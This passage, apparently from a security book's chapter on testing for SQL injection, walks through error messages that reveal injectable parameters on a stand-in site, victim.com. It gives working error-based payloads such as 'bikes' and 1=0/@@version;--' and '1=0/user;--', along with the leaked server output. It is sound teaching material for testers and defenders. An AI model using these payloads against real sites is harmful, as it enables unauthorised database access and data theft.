hapter 2 • Testing for SQL Injection
current web request. Please review the stack trace for more information
about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation
mark before the character string 'attaker;'.
Obviously, you don’t have to memorize every error code. The important thing is that
you understand when and why an error occurs. In both examples, you can assert that the
remote SQL statement running on the database must be something similar to the following:
SELECT *
FROM products
WHERE category='attacker''
The application did not sanitize the single quotes, and therefore the syntax of the
statement is rejected by the database server returning an error.
You just saw an example of injection in an alphanumeric string. The following example
will show the typical error returned when injecting a numeric value, therefore not enclosed
between quotes in the SQL statement.
Imagine you find a page called showproduct.aspx in the victim.com application.
The script receives a parameter called id and displays a single product depending on the value
of the id parameter:
http://www.victim.com/showproduct.aspx?id=2
When you change the value of the id parameter to something such as the following:
http://www.victim.com/showproduct.aspx?id=attacker
the application returns an error similar to this:
Server Error in '/' Application.
Invalid column name 'attacker'.
Description: An unhandled exception occurred during the execution of the
current web request. Please review the stack trace for more information
about the error and where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Invalid column name
'attacker'.
Based on the error, you can assume that in the first instance the application creates an
SQL statement such as this:
SELECT *
FROM products
WHERE idproduct=2
The preceding statement returns a result set with the product whose idproduct field
equals 2. However, when you inject a non-numeric value, such as attacker, the resultant SQL
statement sent to the database server has the following syntax:
Testing for SQL Injection • Chapter 2
SELECT *
FROM products
WHERE idproduct=attacker
The SQL server understands that if the value is not a number it must be a column name.
In this case, the server looks for a column called attacker within the products table. However,
there is no column named attacker, and therefore it returns an error.
There are some techniques that you can use to retrieve information embedded in the
errors returned from the database. The first one generates an error converting a string to an
integer:
http://www.victim.com/showproducts.aspx?category=bikes' and 1=0/@@version;--
Application response:
Server Error in '/' Application.
Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 –
8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft
Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: ) ' to a
column of data type int.
Description: An unhandled exception occurred during the execution of the
current web request. Please review the stack trace for more information
about the error and where it originated in the code.
The database reported an error, converting the result of @@version to an integer and
displaying its contents. This technique abuses the type conversion functionality in SQL Server.
We sent 0/@@version as part of our injected code. As a division operation needs to be executed
between two numbers, the database tries to convert the result from the @@version function
into a number. When the operation fails the database displays the content of the variable.
You can use this technique to display any variable in the database. The following
example uses this technique to display the user variable:
http://www.victim.com/showproducts.aspx?category=bikes' and 1=0/user;--
Application response:
Syntax error converting the nvarchar value 'dbo' to a column of data type
int.
Description: An unhandled exception occurred during the execution of the
current web request. Please review the stack trace for more information
about the error and where it originated in the code.
There are also techniques to display information about the statement executed by the
database, such as the use of having 1=1:
http://www.victim.com/showproducts.aspx?cat